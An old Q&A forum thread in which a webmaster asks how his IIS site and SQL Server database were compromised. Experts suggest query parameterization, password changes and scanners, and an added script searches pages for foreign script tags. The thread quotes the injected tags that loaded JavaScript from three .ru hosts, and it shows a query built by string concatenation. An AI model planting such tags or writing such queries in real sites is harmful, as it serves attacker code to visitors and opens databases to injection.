Solved

regarding IIS server hack

Posted on 2008-10-29
Last Modified: 2013-12-04
Hi,

We have Verio/NTT Windows shared hosting plans, and we have configured an important client's website on them. This is a global client website, so some hackers are always trying to hack it. The website also connects to a SQL Server 2005 database.
But at present the hackers are able to hack the static and dynamic pages (.asp and .html). We have found the following script in our web pages:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<script src=http://www.lang42.ru/script.js></script><script src=http://www.errghr.ru/script.js></script>
<script src=http://www.berjke.ru/script.js></script>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I found the following link, which is related to the website hack issue:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Kindly let me know how I can check my whole website and also the SQL Server to find out how the hackers hacked our website, and also how I can secure our server.

Regards,
Naresh
0
Question by:sitg
 
LVL 32

Expert Comment

by:Daniel Wilson
ID: 22831130
If they changed static pages, it's not JUST a SQL injection.

Did stuff in the database change?  Or just your pages?

If stuff in the DB changed, suspect a SQL injection.  The classic method for hardening against that attack is parameterization of all queries that accept user input.  

e.g. sql = "Select * from Users where Username = '" + Request("Username") + "' "
becomes
sql = "Select * from Users where Username = @UserName"
command.parameters.add ("@userName", Request("Username"))

For the non-SQL-Injection hack ... look at IIS security.
0
 
LVL 2

Expert Comment

by:devshb
ID: 22839639
DanielWilson is right in my opinion; the physical attack/change of the html files does indicate a server/ftp (or possible cms-system admin) security problem rather than just a simple data vulnerability problem.

However, you might have both (physical attacks on the files, and injections/xss to the data)

For data:
Take a look at:
http://www.sqlinjectionscanner.com/

They've got a free data scanner; you can use that to double-check if there's any injected data hanging around in the database.

Securing your code/database is obviously a good idea, but hackers will almost always find any vulnerabilities you might have, so it's a good idea to have a reliable full-scan tool available which is dedicated to the task of checking against injected data/xss attacks in the data.

i.e. click on the download free version of the "ASP SQL Injection Scanner Tool"

I think the physical attack on the files is more pressing than a potential data injection though, because if they can physically change your files then you need to get that aspect secured first, e.g. change all your helm/ftp pwds, and look into the logfiles to see if people are using, say, your own cms admin system (if you have one) to affect the files.

Usually a physical attack like this would be due to a server managing to somehow get onto the server, you might need to totally reformat the server in order to find it because some viruses are buried so deeply that anti-virus software can't find them.

So, I'd say, change all your pwds, look into the logfiles, and check with the host to see if a virus is actually on the server itself.
0
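Added example, not part of the original thread and not any poster's code: one way to check the whole site for tags like the ones quoted in the question is to walk a copy of the web root and report every `<script src=...>` that loads from a host outside an allow-list. The allow-list entry `www.example.com`, the extension list and the sample pages built in `demo()` are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Assumption: hosts this site legitimately loads scripts from (placeholder value).
ALLOWED_HOSTS = {"www.example.com"}
EXTENSIONS = (".asp", ".html", ".htm", ".inc")

# <script ... src=URL>, with the URL double-quoted, single-quoted or unquoted.
SCRIPT_SRC = re.compile(
    r"""<script\b[^>]*?\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)
# Host part of an absolute (http://host/...) or protocol-relative (//host/...) URL.
URL_HOST = re.compile(r"(?:[a-z][a-z0-9+.-]*:)?//([^/?#\s]+)", re.I)

def external_script_hosts(text):
    """Hosts of script URLs in text that are absolute and not allow-listed."""
    hosts = []
    for match in SCRIPT_SRC.finditer(text):
        url = next(g for g in match.groups() if g is not None)
        found = URL_HOST.match(url.strip())  # None for relative URLs
        if found and found.group(1).lower() not in ALLOWED_HOSTS:
            hosts.append(found.group(1).lower())
    return hosts

def scan_tree(root):
    """Return (relative path, line number, host) per suspicious tag, read line by line."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(f for f in files if f.lower().endswith(EXTENSIONS)):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for host in external_script_hosts(line):
                        findings.append((os.path.relpath(path, root), lineno, host))
    return findings

def demo():
    """Scan a constructed web root; default.asp carries two tags from the question."""
    injected = ("<script src=http://www.lang42.ru/script.js></script>"
                "<script src=http://www.errghr.ru/script.js></script>\n")
    clean = '<script type="text/javascript" src="/js/menu.js"></script>\n'
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("default.asp", clean + injected), ("about.html", clean)):
            with open(os.path.join(root, name), "w") as fh:
                fh.write("<html>\n" + body + "</html>\n")
        return scan_tree(root)

if __name__ == "__main__":
    print(*("%s:%d: script loaded from %s" % f for f in demo()), sep="\n")
```

Run `scan_tree()` against a downloaded copy of the site; every file it lists should be restored from a known-good copy, and a clean result on the files says nothing about injected content still stored in the database.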
 
LVL 2

Expert Comment

by:devshb
ID: 22839648
"Usually a physical attack like this would be due to a server managing to somehow get onto the server"

I meant:

"Usually a physical attack like this would be due to a *virus* managing to somehow get onto the server"

(sorry)
0
 

Accepted Solution

by:
sitg earned 0 total points
ID: 23053650
I have run the Acunetix Web Vulnerability Scanner and resolved this issue;
lots of web pages had SQL injection issues.

Regards,
Naresh
0
